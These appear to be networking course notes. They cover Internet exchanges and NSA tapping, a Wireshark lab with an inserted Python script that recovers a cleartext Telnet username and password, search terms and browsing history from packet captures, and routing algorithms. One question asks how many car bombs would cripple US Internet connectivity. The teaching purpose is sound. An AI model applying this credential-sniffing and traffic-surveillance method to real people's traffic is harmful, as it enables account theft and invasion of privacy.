In 1990 the ARPANET was retired and the Internet, as such, was then run by the National Science Foundation, and renamed NSFNET. The National Science Foundation decided that the NSFNET should only be accessed by lofty high-minded academics, and not by grungy businesses that are out to make a seedy profit by providing services to the unwashed masses. As a result of the National Science Foundation's Acceptable Use Policy, businesses found they were not permitted to connect to each other by using the NSFNET.

What to do? What to do? Businesses decided to bypass the NSFNET and directly connect to each other! If Business A wanted to connect to Business B, the solution was to run a physical cable from a router in Business A's network to an intermediate router, and run a cable from a router in Business B's network to this same intermediate router. The only problem, then, was to find a location where one of Business A's routers and one of Business B's routers could be placed adjacent to this intermediate router. Once all three routers are collocated, running the two cables to connect Business A and Business B would be easy.

Along came a company named MFS. MFS purchased a building, installed a very expensive (very capable) router and advertised itself as Metropolitan Area Exchange-East (MAE-East). MFS basically advertised: "Bring your router to MAE-East, and we will connect your router to our central router (thus connecting everyone's routers together)." The response to this advertisement was overwhelming: Companies showed up at MAE-East, Internet Service Providers showed up at MAE-East—basically, anyone who wanted to interconnect to others showed up at MAE-East. By 1997, half of the Internet's traffic went through MAE-East.

The surprising thing is that MAE-East is not a logical location that exists in theory. MAE-East is the fifth floor of 8100 Boone Boulevard in Tysons Corner, Virginia (with equipment overflowing into an adjacent parking garage).
The original notion of the Internet being geographically distributed and spread out was over; there were now just a few chokepoints through which all the Internet's traffic passed.

(Photo, labeled McDonald's and MAE-East: 1997: 50% of Internet traffic goes through the fifth floor of this building.)

NSFNET eventually dissolved and sold off its components, and the Internet in turn evolved into a collection of independent networks—termed autonomous systems—all interconnected to each other through locations such as MAE-East. Today, in fact, the Internet is a collection of about 42,000 independent networks (again—autonomous systems is the proper term), interconnected to each other. But we are getting a little ahead of ourselves—let's go back to the 1990s!

In the late 1990s, organizations decided that it was technologically better to directly connect their autonomous systems to each other without a middleman router (such as that provided in MAE-East). Digital Equipment Corporation purchased a building at 529 Bryant Street in Palo Alto, California, christened it the Palo Alto Internet Exchange (PAIX) and advertised: "Bring a router connected to your autonomous system to 529 Bryant Street, and we will directly connect it to other autonomous systems in our building." By 2000, PAIX was the Internet's main connectivity hub.

529 Bryant Street? What's that, you ask? That would be this nondescript building:

Gee. What a nice building. I wonder what goes on inside? Surprisingly, even today this unremarkable building remains one of the Internet's most critical locations, one of the few major key connectivity nodes.

Another key focal point, where various autonomous systems are connected together, is MAE-West at 55 Market Street in San Jose. By some estimates, a third of the nation's Internet traffic goes through this single building:

The surprising point bears emphasizing: There exists a discrete set of geographic locations through which a large percentage of the Internet's traffic is funneled.
More examples: Almost all Internet traffic between North and South America travels through a building at 50 N.E. Ninth Street, Miami, FL. You might be happy to know that in recent years the Internet has moved back to the East Coast! One of the main Internet focal points today is the Equinix campus in Ashburn, Virginia, near Dulles Airport.

While it is true that the Internet of today is decentralized in terms of control (no one independent autonomous system is able to control another independent autonomous system), it is decidedly not decentralized in terms of geography. There are, in fact, many geographic choke points of great connectivity.

In summary, today there are approximately 42,000 autonomous systems (networks) connected together to form the Internet. The locations where these autonomous systems are connected together (those beautiful buildings we have shown pictures of) are termed Internet Exchanges. These Internet Exchanges allow networks to connect directly to each other. The street addresses for these Internet Exchanges are readily accessible. See, for example, the Internet Exchange map published by TeleGeography, located here: http://www.internetexchangemap.com/

Question 1: How many Internet exchanges are within 100 miles of Washington, D.C.?

Question 2: What is the address for the Internet Exchange located in Milwaukee?

Journalist Andrew Blum describes a visit he made to this building (the address you gave in your answer to Question 2) with a colleague named Jon Auer in 2011:

A sleepy-eyed guard sat listlessly behind a worn-out desk in the empty lobby. Auer nodded in her direction and led us down a narrow tiled passageway to the basement... Auer pointed to a steel box tucked into a dark corner, its LED lights blinking away. This was the main access point for Milwaukee's municipal data network, connecting libraries, schools and government offices. "All this talk about Homeland Security, but look what someone could do in here with a chainsaw."
Question 3: There are 68 Internet exchanges in the United States. If you had a small terrorist army and wanted to cripple the United States by obliterating its Internet connectivity, how many well-placed car bombs would you need (to the nearest 100)?

There must be some other reason why we showed you pictures of those pretty buildings, right? Well, besides being critical security weak spots, these buildings became very popular locations for small NSA field offices following the attacks of September 11, 2001. In his bestseller The Shadow Factory, James Bamford details how the NSA went to these various Internet Exchanges in the United States and installed taps at the main interconnections. In this way, the NSA was able to monitor what amounted to, roughly, ALL Internet traffic.

Question 4: If you worked for the NSA and wanted to install taps on the Internet to monitor all Internet traffic, how many locations would you need to visit (to the nearest hundred)?

The issues involving the invasion of privacy suffered by everyday Americans through the NSA's tapping of traffic at the Internet Exchanges remain controversial to this day.

Part II: Your NSA Internship!

CONGRATULATIONS! You have been selected for a summer NSA internship! How exciting! You are now meeting your new boss! Well hello there! Welcome aboard! I'm Eric. What is your name? I'm sorry... what did you say your first name was? Ok... welcome aboard, Midshipman!

Your boss Eric tells you that the NSA suspects a midshipman living in Bancroft Hall (where else?) is allied with a terrorist group. The midshipman's last name is Roy, and the NSA has been tapping into his Internet traffic for some time through a tap at MAE-East. You will be asked to analyze several captures of MIDN Roy's traffic using the Wireshark program. In fact, you are given three tasks. Again, it is difficult to contain the excitement, and we again congratulate you.
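The three tasks that follow walk through these extractions by hand in Wireshark. The Python script below is an added example, not part of the original notes or of the lab's capture files: it performs the same three extractions programmatically with only the standard library, so you can see what Wireshark is doing underneath (parsing the libpcap container, separating Telnet option negotiation from keystrokes, counting packets per conversation, and pulling Host headers and the search= query parameter out of HTTP GET requests). Everything it parses is constructed sample data built inline: the client keeps the lab's 192.168.1.7, the servers use RFC 5737 documentation addresses, and the credentials, host names and search term are made up. It therefore runs offline and says nothing about the contents of telnetdata.pcap, secondcapture.pcap or webtraffic.pcap.

```python
# Added example (not part of the EC310 lab): the three Wireshark extractions done with
# the standard library on a capture built inline from constructed data (client 192.168.1.7
# as in the lab; servers in RFC 5737 ranges; made-up credentials, hosts and search term).
import struct
from collections import Counter, namedtuple
from urllib.parse import parse_qs, urlsplit

Packet = namedtuple("Packet", "src dst proto sport dport payload")
IAC, SB, SE = 255, 250, 240                     # Telnet command bytes (RFC 854)

def parse_pcap(data):
    """Return a Packet for every IPv4 frame in a classic libpcap file."""
    if data[:4] not in (b"\xd4\xc3\xb2\xa1", b"\xa1\xb2\xc3\xd4"):
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    endian = "<" if data[0] == 0xD4 else ">"
    pos, packets = 24, []                       # skip the 24-byte global header
    while pos + 16 <= len(data):
        _sec, _usec, incl, _orig = struct.unpack(endian + "IIII", data[pos:pos + 16])
        frame = data[pos + 16:pos + 16 + incl]
        pos += 16 + incl
        if frame[12:14] != b"\x08\x00":         # EtherType: IPv4 only
            continue
        ip = frame[14:]
        ihl, total, proto = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
        src, dst = (".".join(map(str, ip[o:o + 4])) for o in (12, 16))
        seg, sport, dport, payload = ip[ihl:total], 0, 0, b""
        if proto == 6:                          # TCP: read the ports, skip the header
            sport, dport = struct.unpack("!HH", seg[:4])
            payload = seg[(seg[12] >> 4) * 4:]
        packets.append(Packet(src, dst, proto, sport, dport, payload))
    return packets

def strip_telnet_options(data):
    """Drop in-band IAC negotiation (DO/WILL/SB ...) and keep only the user's data."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC or i + 1 == len(data):
            out.append(data[i]); i += 1
        elif data[i + 1] == IAC:                # IAC IAC is an escaped 0xFF data byte
            out.append(IAC); i += 2
        elif data[i + 1] == SB:                 # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:                                   # WILL/WONT/DO/DONT carry an option byte
            i += 3 if 251 <= data[i + 1] <= 254 else 2
    return bytes(out)

def telnet_login(packets, client):
    """Task 1: join the client's keystrokes to port 23; the first two Enter-terminated
    lines are the username and password the server prompted for."""
    stream = b"".join(p.payload for p in packets if p.src == client and p.dport == 23)
    lines = strip_telnet_options(stream).replace(b"\r\x00", b"\r\n").split(b"\r\n")
    return (lines[0].decode(), lines[1].decode()) if len(lines) > 2 else None

def busiest_conversation(packets):
    """Task 2: the endpoint pair with the most packets (Wireshark's Conversations view)."""
    pair, count = Counter(frozenset((p.src, p.dst)) for p in packets).most_common(1)[0]
    return tuple(sorted(pair)), count

def http_requests(packets, client):
    """Tasks 2 and 3: (host, path, search terms) for each GET the client sent to port 80."""
    out = []
    for p in packets:
        if p.src != client or p.dport != 80 or not p.payload.startswith(b"GET "):
            continue
        lines = p.payload.partition(b"\r\n\r\n")[0].decode("latin-1").split("\r\n")
        target = urlsplit(lines[0].split(" ")[1])   # request-target from the GET line
        host = next((l.split(":", 1)[1].strip() for l in lines[1:]
                     if l.lower().startswith("host:")), "?")
        out.append((host, target.path, parse_qs(target.query).get("search", [])))
    return out

def sites_visited(requests):   # hosts whose landing page (GET /) was requested; ads are not
    return sorted({host for host, path, _ in requests if path == "/"})

def _frame(src, dst, sport, dport, payload):    # constructed Ethernet/IPv4/TCP frame
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload   # checksums left zero

def build_sample_pcap():
    """Constructed capture: a Telnet login typed one keystroke per packet, then three GETs."""
    C, T = "192.168.1.7", "203.0.113.5"
    flows = [(C, T, 40000, 23, b"\xff\xfd\x01"),                 # IAC DO ECHO
             (T, C, 23, 40000, b"\xff\xfb\x01login: ")]           # IAC WILL ECHO, prompt
    flows += [(C, T, 40000, 23, bytes([b])) for b in b"guest\r\n"]
    flows += [(T, C, 23, 40000, b"guest\r\nPassword: ")]
    flows += [(C, T, 40000, 23, bytes([b])) for b in b"letmein\r\n"]
    flows += [(C, "198.51.100.10", 40001, 80, b"GET /w/index.php?search=Dijkstra%27s+algorithm"
               b"&title=Special%3ASearch HTTP/1.1\r\nHost: en.wikipedia.org\r\n\r\n"),
              (C, "198.51.100.20", 40002, 80, b"GET / HTTP/1.1\r\nHost: www.bbc.com\r\n\r\n"),
              (C, "198.51.100.30", 40003, 80, b"GET /px.gif HTTP/1.1\r\nHost: ads.example.net\r\n\r\n")]
    records = b"".join(struct.pack("<IIII", 1420000000 + n, 0, len(f), len(f)) + f
                       for n, f in enumerate(_frame(*args) for args in flows))
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1) + records

if __name__ == "__main__":
    pkts = parse_pcap(build_sample_pcap())
    print("login:", telnet_login(pkts, "192.168.1.7"), "| busiest:", busiest_conversation(pkts))
    print("requests:", http_requests(pkts, "192.168.1.7"), "| sites:", sites_visited(http_requests(pkts, "192.168.1.7")))
```

To use it on a real file, pass the bytes of a classic-format capture (open(path, "rb").read()) to parse_pcap; pcapng, which newer Wireshark versions write by default, is a different container and is rejected rather than misparsed. The Telnet part is the point of Task 1 in miniature: the keystrokes arrive one per packet, interleaved with option negotiation, but nothing is encrypted, so reassembling the client-to-server stream is all an eavesdropper needs.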
Task 1: Capturing a password

Eric tells you that the first capture of MIDN Roy's Internet traffic is located in the file telnetdata.pcap. The NSA suspects that this packet capture contains MIDN Roy's use of a Telnet session. Telnet is a networking protocol that provides communication with a remote server. Many Telnet servers require the user to enter a username and password to access the service, and because Telnet carries everything, including those credentials, in cleartext, the NSA is hoping you can extract MIDN Roy's username and password from the file. The NSA suspects that MIDN Roy is using the IP address 192.168.1.7.

Start up VMware Workstation and power on your Cyber2 VM. Then launch Wireshark by selecting: Applications > Internet > Wireshark (as root). Under File, click Open, highlight the file named telnetdata.pcap, and then hit Open.

Recall that MIDN Roy has the IP address 192.168.1.7. The very first packet (Packet 1) is a DNS request. Recall that DNS is used to determine the IP address for a given domain name. In other words, if we give DNS a website name such as www.foxnews.com, DNS will tell us that the IP address is 23.15.7.144. So, in the very first line of the capture (we will call this "packet 1" although, technically, this is not a packet... it's a packet inside an Ethernet frame) we see that MIDN Roy is trying to find the IP address for a website. What website might this be? Look in the Info field of Line 1 in the Packet List pane, and look at the Domain Name System Query information in the middle pane (the Packet Details pane).

Question 5. What website is MIDN Roy attempting to find the IP address for?

Packet 2 is the DNS reply to the DNS request in packet 1.

Question 6. What is the IP address that corresponds to the website that MIDN Roy is accessing?

MIDN Roy is attempting to establish a telnet session with the server located at the IP address you provided in Question 6 above.
Let's focus on just the telnet packets by entering telnet in the filter field and then hitting Enter. Now, we are attempting to determine the username and password that MIDN Roy entered in order to log on to the remote server. So, we wish to concentrate only on the packets that have MIDN Roy's IP address (192.168.1.7) as a source. Click the Source column header to order the packets by source IP address. Notice the packets are no longer in sequence; the first packet listed is packet 7, which is the first Telnet packet sent by MIDN Roy.

To examine the Telnet data, concentrate on the middle pane (the Packet Details pane) and click the arrow next to Telnet for the first listed packet (packet number 7). You will see that in the very first Telnet packet sent from MIDN Roy, he is asking the remote server to please echo back (Do Echo) what he types, so that he sees it on his screen as he is typing. This is Telnet option negotiation: commands such as Do Echo travel in-band, mixed with the user's keystrokes, which is why Wireshark shows them on separate lines from the Data. For information (although it does not apply to this particular packet), \r is the escape sequence for carriage return (back to the beginning of the same line) and \r\n moves us to the beginning of the next line. Telnet's network virtual terminal sends end-of-line as \r\n, "Carriage Return Line Feed", whereas Unix represents a new line with \n alone; so when the user hits Enter you should expect to see \r\n in the capture.

Examine the Telnet data for each of these packets. Telnet typically sends each keystroke in its own packet, so the username and password will be spread across a sequence of one-character Data packets; read them off in order.

Question 7: What username is MIDN Roy using?

Question 8: What password is MIDN Roy using?

So, you know the password that MIDN Roy uses for this one specific site. But... check out this recent short news item: http://www.reuters.com/article/2014/08/05/us-cybercrime-breach-russia-idUSKBN0G52HS20140805

Question 9: What use might it be to know MIDN Roy's password for this one specific site?

Task 2: Capturing a search term

Eric has just returned from the Bolshoi Ballet and he is very proud of your work in Task 1. He has now given you a second packet capture obtained by snooping on MIDN Roy.
This second packet capture is located in the file secondcapture.pcap. In Wireshark, close the file you were working on, and open the file secondcapture.pcap. Clear the filter if you see that it is still set to telnet.

Question 10. How many packets are in this capture?

You are told: "Analyze this packet capture." What do you do? So many packets. So little time. You know from the prior packet analysis that the user had IP address 192.168.1.7, so you click the Source column header to order the packets by IP address.

Question 11. Is MIDN Roy's old IP address (192.168.1.7) listed?

You ask a fellow intern what to do, and he says that he heard that it is sometimes a good idea to see all the conversations that have gone on in the packet capture. Let's select Statistics => Conversation List => IPv4.

Question 12. How many separate conversations are taking place in this packet capture?

So... which of these IP addresses corresponds to MIDN Roy? To answer this, look at the third column, labeled Packets. This lists how many packets have been sent between the two endpoints on that line. For example, in the picture below, we see that 2 packets were sent between IP addresses 10.52.49.232 and 224.0.0.1. So... if this is indeed a packet capture from MIDN Roy, then it stands to reason that MIDN Roy should have been doing the most talking, i.e., sending or receiving the most packets. So... focusing on the conversations that involved the most packets (the bottom of the list), we should be able to determine MIDN Roy's IP address. (Keep in mind that this is a heuristic: another busy host on the same network segment can also show up near the top of the list, which is why you are asked to verify your answer.)

Question 13. What would be your guess about MIDN Roy's IP address?

Question 14. Given your answer above (MIDN Roy's IP address), which IP address does MIDN Roy seem to be communicating with the most?

Verify your answers to Questions 13 and 14 with your instructor or lab tech before proceeding! So... who owns this IP address that MIDN Roy is communicating with? Glad you asked!
IP addresses in the United States, Canada and parts of the Caribbean are assigned by the American Registry for Internet Numbers (ARIN). Let's go to their website, https://www.arin.net/, and in the Search Whois box at the upper right (see picture below for the location), enter the IP address that MIDN Roy is communicating with (which was your answer to Question 14).

Question 15. Who owns this IP address? Does this corporation sound familiar?

Go to the Wikipedia page for Wikipedia (i.e., go to Wikipedia, and then enter the search term "Wikipedia"). Review the summary shown in the right sidebar of the webpage.

Question 16. Who owns Wikipedia?

Question 17. To summarize, in this packet capture that you are examining, where is MIDN Roy spending most of his time?

So, let's focus on the packets that are sent from MIDN Roy to this particular website. Click on the Destination column header, and then scroll down to the first packet that is from MIDN Roy to the IP address we are interested in. You recall from SI110 that webpages are retrieved using the HTTP GET command. Let's focus just on the packets that are from MIDN Roy, to the website of interest, that use the GET command (which, if used, will appear as the word GET in the Info field).

Question 18. How many packets do you need to focus on? That is, how many packets have MIDN Roy's IP address as the Source, have the target's IP address as the Destination, and have the word GET appearing as the first item in the Info field?

Question 19. Okay, time to put all your cyber skills to use! What are the two terms that MIDN Roy searched for on Wikipedia? Hint: Look for "search=" somewhere in the string following the word GET in the Info field. The search term is carried in the URL's query string, so spaces and punctuation will appear percent-encoded (for example, a space becomes + or %20).

Task 3: Capturing browsing history

Eric has just returned from lunch with the Russian ambassador and he is thrilled with the work you have done. He has given you a third packet capture from MIDN Roy and has asked you to analyze the capture to determine the websites where MIDN Roy has been spending his time.
You are given a packet capture named webtraffic.pcap. Your goal is to determine three distinct websites that MIDN Roy has visited. In Wireshark, close the file you were working on, and open the file webtraffic.pcap. Click on the No. column header (i.e., the leftmost field) if necessary so that the first packet listed is Packet 1.

Question 20. What is the time duration of this packet capture?

Question 21. How many total packets were captured?

Select Statistics => Summary.

Question 22. How many total bytes are in this packet capture?

Question 23. On average, how many bytes per second were captured? This is just a packet capture from one midshipman!

Question 24. Let's say there are 1 billion people online. If they generate traffic at approximately the same rate as MIDN Roy, what is the total Internet traffic generated (in bytes) per second?

Question 25. Using this value, how many bytes of Internet traffic are generated per day? Note that the printed collection of the U.S. Library of Congress is estimated to be 10^13 bytes.

Question 26. If the NSA is vacuuming up all of the Internet's data, can the data actually be used... or is there simply too much data for anyone, even the NSA, to make sense of?

Question 27. Looking at the conversations (Statistics => Conversation List => IPv4), guess MIDN Roy's IP address.

Verify your answer to Question 27 with your instructor or lab tech before proceeding!

Since we want to determine the websites that MIDN Roy has visited, let's filter our display so that it shows only HTTP packets by entering http in the filter. Now, click the Source column header to group IP addresses together, and scroll down to where MIDN Roy's packets start. Now, here is what you need to do: You need to search through the GET packets to find the websites that MIDN Roy browses. You might be saying: "AGHHH... that's a lot of GET commands!" But... it's not so bad. Click on the very first GET packet from MIDN Roy.
If you examine the GET info for this command you will see, in the request's Host header, that the host he is contacting is www.bbc.com! This provides a very good clue that one of the websites that MIDN Roy is visiting is www.bbc.com. There, you have found one of the three websites MIDN Roy visited. Now click the second and third GET packets. You should see that these are also to www.bbc.com.

Question 28. What are the other two sites that MIDN Roy visited in this packet capture?

Note that a request line of GET / HTTP/1.1 (a request for a site's top-level page) provides a good indication of an initial request to a website. Much of the traffic that follows consists of assorted advertisements, tracking and monitoring sites, and related sites (e.g., "Follow us on Facebook"); each of these generates its own GET requests with its own Host header, so do not mistake them for sites MIDN Roy deliberately visited.

Security Exercise 14 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24:
Question 25:
Question 26:
Question 27:
Question 28:

Chapter 15: Routing Part II

Objectives:
(a) Describe the fundamental algorithms used to construct routing tables.
(b) Describe how a routing table is developed using link state routing.
(c) Describe how a routing table is developed using distance vector routing.
(d) Identify the relative advantages and disadvantages of link state routing and distance vector routing.

In the previous lecture we used routing tables that already existed. Armed with the knowledge of how to use routing tables, in this lecture we discuss where those routing tables actually come from (i.e., how they are derived). Up until this point we have talked about simple examples where one router is the only path to one network. In reality, things are much different. Often there can be multiple paths from one network to another.
The question is not just how to get from Point A to Point B, but how to get there using a good route.

I. What is a Good Route?

1. Routing Algorithms. A routing algorithm tells a router which outgoing line an incoming packet should be placed on. For IP packets, the routing decision is made from scratch for each packet that arrives. A routing algorithm should endeavor to satisfy the following attributes:

Correctness: packets should be routed to the proper destination.
Simplicity: algorithms should be clean and simple so that packets are routed quickly to their destinations. Unwieldy Rube Goldberg-type algorithms are to be avoided.
Robustness: algorithms should adapt to changes in the network's topology caused by router or link failures.
Stability: the algorithm should converge to a specific solution; packets should not be left aimlessly circulating in loops around the network.
Optimality: if there are multiple ways to get from Point A to Point B, the algorithm should provide the optimal path through the network.

Routing is accomplished by routing protocols, which establish routing tables in each router. The router consults its table to determine how to route packets.

2. Networks as Graphs. To develop routing algorithms we model a computer network as a graph: the nodes of the graph are the routers, and an edge in the graph represents a communication link between two routers. On each edge between two routers, we assign a weight. This weight might be distance, cost, queuing delay, or some other factor of interest. Our problem: Find the path from a given source node to a destination node which minimizes the total weight.

If our weights represent:   then we are interested in:
distance                    shortest path
cost                        cheapest path
queuing delay               fastest path

3. Routing with Partial Information. Routing is somewhat complicated by the fact that decisions are based on partial information. But we encounter such situations every day. Consider driving down a road: Not every road sign lists every destination.
But, usually there is a default! (In road travel, the default is: If your destination is not listed on the sign, keep driving straight.) When taken as a whole, routing tables (like road signs) must be consistent and complete. It is important that:

all explicit directions correctly point to a shortest path, and
all shortest paths for all destinations be explicitly noted in the tables.

Note that routers make local routing decisions, i.e., they decide the next place to send a packet addressed to a specific destination. But they must make this decision based on some understanding of the global network picture. So, each router needs global information about the network. It is somewhat confusing, so the point bears repeating: Routers make local routing decisions based on global information.

Recall that routing protocols establish routing tables in each router, and, as a simplification, we can say that these tables have the following format:

Destination address | Address of the next element on the best path to the destination

When a packet shows up at a router, the router refers to the routing table to decide where to send the packet. To get an idea of what a routing table should look like for a larger network than those we have treated up to this point, consider the network of ten routers shown below on the left. Suppose the weight of each link is one. The question is: What should the routing table be for Router 1? The answer to this question is shown on the right.

Routing Table for Router 1:
destination   next hop
2             2
3             3
4             2
5             3
6             3
7             3
8             3
9             3
10            2

Practice Problem 15.1 Consider the network shown below, where the numbers on the edges indicate the cost of using that edge. For example, the cost of using the link from Router A to Router B is 1, whereas the cost of using the link from Router A to Router D is 4.

(a) Fill in the routing table for Router A, and include the total cost.
(Figure: the network for Practice Problem 15.1, Routers A through F with edge costs.)

Solution:

Destination   Next Hop   Total Cost
B
C
D
E
F

(b) If all routers have the correct routing tables, what is the path that an IP packet travels from Node A to Node F? (Note that to state a path, you just need to state the sequence of routers encountered along the path; for example, one possible path from Router A to Router F is A-D-E-F.)

Solution:

(c) What is the total cost of the path you selected in Part (b) above?

Solution:

II. Routing Protocols

So, now that we know what routing tables should look like, we ask the question: How do routing tables actually get put together? You likely solved the preceding example by looking down on the network and performing a visual analysis of the picture. Routers do not have the ability to hover over a picture of the network, and they do not have human visual skills at their disposal for use in analyzing a diagram. Routers use routing protocols to build their routing tables. Routing protocols are intended to:

Communicate network topology information to each router.
Determine how individual routers will use this information to make routing decisions (i.e., determine how individual routers will use this information to construct routing tables like the one shown above).

We will discuss two routing methodologies: Link State Routing and Distance Vector Routing.

1. Link State Routing

A. Two key ideas:

Each router learns the full network topology. That is, each router learns a complete picture of the network graph: the routers, the links and the link weights.
Knowing the complete network picture, each router independently computes the optimal routes to each destination and constructs a routing table.

B. Learning the topology. The first bullet above says "routers learn the full network topology." So, in link state routing, how do routers come to know the network topology? Here's how: Each router learns its neighbors' addresses by sending "Hello" packets to which its neighbors reply.
Each router determines the weight of each of its links. For example, if these weights represent time delays, the routers might determine how long it takes to receive a reply, and use that as the weight. If the weight is a cost, the router might "know" the costs associated with each link based on data entered by a network administrator.

Each router then transmits packets that tell information about that individual router's links. For instance, in the picture below (Router 26 linked to Router 18 with weight 4, to Router 35 with weight 2, and to Router 51 with weight 3), Router 26 sends a packet that essentially says:

My name is Router 26.
Router 18 is connected to me and the weight of the edge joining us is 4.
Router 35 is connected to me and the weight of the edge joining us is 2.
Router 51 is connected to me and the weight of the edge joining us is 3.

Or, somewhat more formally, it transmits a packet that conveys the following table:

Router 26
Router   Weight
18       4
35       2
51       3

By sending this packet, a router informs the network about the status, or state, of each of its links. Hence, this methodology is called Link State Routing and these packets are called Link State Packets (LSPs). This info will then be used by others to construct routing tables. These LSPs are distributed to all other routers using "controlled flooding": When a router receives an LSP, it gives it to all of its neighbors. A router keeps track of which LSPs it has seen, and only floods them the first time they arrive. Now... think about this: After each router has sent its LSP, and after each LSP has circulated to all the other routers, then does each router have a full and complete picture of the network topology? The answer is Yes! But what then? We still don't have routing tables in each router. The answer: Each router determines the shortest path (i.e., the path with the lowest total weight) from itself to every other node in the network by running a famous algorithm named "Dijkstra's Algorithm".
This relatively easy algorithm is covered in any Discrete Math textbook, but will not be covered in EC310. See the box below for more information about Dijkstra's Algorithm. It is important that the fundamental idea be understood. In link state routing:

Each router, in its LSP, sends information about its neighbors only.
The information in this LSP is sent to all other routers.

An Aside: Do routers really have names like 'Router 26'? Yes! In the Internet's OSPF routing protocol, a router identifies itself to all other routers using a unique 32-bit identifier, conventionally one of its IP addresses, called a Router ID. Additionally, every OSPF message a router sends includes its Router ID so that other routers know who originated the message. For this reason it is very important that the address used as the Router ID is always available. As you know, hardware (like your trusty drill rifle) is prone to failure. Therefore, the address of a special software interface called the loopback interface is commonly chosen as the Router ID. The loopback interface, because it is implemented in software, stays active regardless of whether one or two hardware interfaces on the router stop working. This ensures routers can always find each other to communicate when needed. What are the routers talking about with each other, and why do they need to communicate so often? There are a number of internal measures routers use in order to increase efficiency and prevent unnecessary information from clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSUs). To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.

An Aside: Because of time constraints in EC310, we just say: Each router runs Dijkstra's Algorithm. This is a well-known algorithm which solves this problem (the details of which we skip). You should know, though, that the algorithm is truly one of the all-time beauts in network theory.
The algorithm solves the problem: Find the shortest path from Node X to every other node in an arbitrary network where the edges have nonnegative weights associated with them. The algorithm is not hard, but would require a full period (perhaps) to fully explain it. Many reasonably good explanations can be found on the web. Dijkstra's Algorithm has two interesting (non-technical) facts associated with it. First, the algorithm was published in 1959. We realize that to the average midshipman, the year 1959 might as well be 1659, but, truth be told, 1959 is really not that long ago! It is fascinating to think that the basic problem of determining the shortest path in a network eluded the great minds throughout history (Euclid, Euler, Newton, Leibniz, Descartes, Fermat, Hilbert), not to be solved until 1959. Second, the algorithm was published in a journal article that was strikingly brief. The paper presenting this earthshattering result was slightly over two pages long. Just two pages! Next time your History prof tells you that your paper needs to be 10 pages to say anything of value, reply: "WRONG! Haven't you heard of Dijkstra!" Dijkstra had a number of interesting personal idiosyncrasies. Despite the fact that he pioneered structured computer programming and contributed a key concept (the semaphore) to the study of operating systems, he limited his own use of computers. Until the time he retired from academe in 2000 he wrote all his papers by hand, used only the chalkboard for teaching, and strictly limited his computer use to web browsing and email. He passed away in 2002 at age 72.

Practice Problem 15.2 Given the following network map with the weights of edges between routers:

(Figure: the network map for Practice Problem 15.2.)

(a) Construct the Link State Packet (LSP) that Router C would send to Router B.

Solution:

(b) After Router G runs Dijkstra's Algorithm, what would be the optimal route from Router G to Router B, and what would be the total cost of this route?

Solution:

C. Topology changes.
What if a link dies? For instance, in the Router 26 picture above, what if the link connecting Router 18 to Router 26 should die? In link state routing, whenever a router detects a change in the state of its links, it sends a new link state packet. Thus, if the link connecting Router 18 to Router 26 should die, Router 26 will transmit a new LSP with the entries:

Router 26
Router   Weight
35       2
51       3

Note that Router 18 will also detect the loss of its connection to Router 26 and transmit a new LSP as well. These new LSPs will then propagate to all other routers via controlled flooding. You might be wondering: Won't there now be conflicting information in the other routers? For instance, there will now be two pieces of information from Router 26: the old LSP from Router 26 that had info about the link to Router 18:

Router 26
Router   Weight
18       4
35       2
51       3

and the revised LSP without info about Router 18:

Router 26
Router   Weight
35       2
51       3

Which of these should another router in the network choose to use to build its network picture and run Dijkstra's Algorithm? To solve this perplexing predicament, yielding a righteous resolution to this difficult dilemma, and thus causing midshipman merriment, each LSP has a sequence number. That is, a router stamps its first LSP with sequence number 1, its second LSP with sequence number 2, and so forth. Higher sequence numbers override lower sequence numbers. So, when other routers in the network receive a new LSP from Router 26, they will notice that it has a higher sequence number than the previous LSP, and they will delete the previous (outdated) LSP. The sequence number is also how a router decides whether it has "seen" an LSP before: a copy whose sequence number is not higher than the one already stored is dropped rather than re-flooded, which is what keeps controlled flooding from looping forever.

Okay... each router has to send LSPs when the router is first connected to the network, and also has to send LSPs whenever the network topology changes. Are there any other times that routers send LSPs? The answer is Yes! All routers also send LSPs periodically, just to make sure all routers are "on the same page." Where is link state routing used in the Internet?
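Holding that question for a moment: the Python program below is an added example, not from the notes, that simulates exactly what was just described. Routers exchange LSPs by controlled flooding, keep only the highest sequence number from each origin, run Dijkstra's Algorithm over the resulting link state database to obtain a routing table of destination to (next hop, total weight), and react when the 18-26 link dies. Router 26's links (18 at weight 4, 35 at weight 2, 51 at weight 3) are taken from the figure above; Router 7 and the remaining links are constructed so that there is a second way to reach Router 18 once the direct link is gone.

```python
# Added example (not from the EC310 notes): link state routing in miniature.
# An LSP is (origin, sequence number, {neighbor: weight}). Every router keeps a
# link state database, forwards an LSP only the first time it sees it, and runs
# Dijkstra on the database to get destination -> (next hop, total weight).
# Topology is constructed: Router 26's links match the notes; Router 7 is made up.
import heapq

class LinkStateRouter:
    def __init__(self, rid):
        self.rid = rid
        self.lsdb = {}                  # origin -> (seq, {neighbor: weight})

    def receive_lsp(self, origin, seq, links):
        """Install an LSP and return True only if it is newer than the stored
        one (so the caller floods it on); duplicates and stale copies return False."""
        stored = self.lsdb.get(origin)
        if stored is not None and stored[0] >= seq:
            return False
        self.lsdb[origin] = (seq, dict(links))
        return True

    def routing_table(self):
        """Dijkstra over the database. Each LSP contributes the directed edges
        origin -> neighbor, so a link its owner has withdrawn is never used."""
        adj = {origin: links for origin, (_, links) in self.lsdb.items()}
        dist, first_hop, done = {self.rid: 0}, {}, set()
        heap = [(0, self.rid)]
        while heap:
            d, u = heapq.heappop(heap)
            if u in done:
                continue
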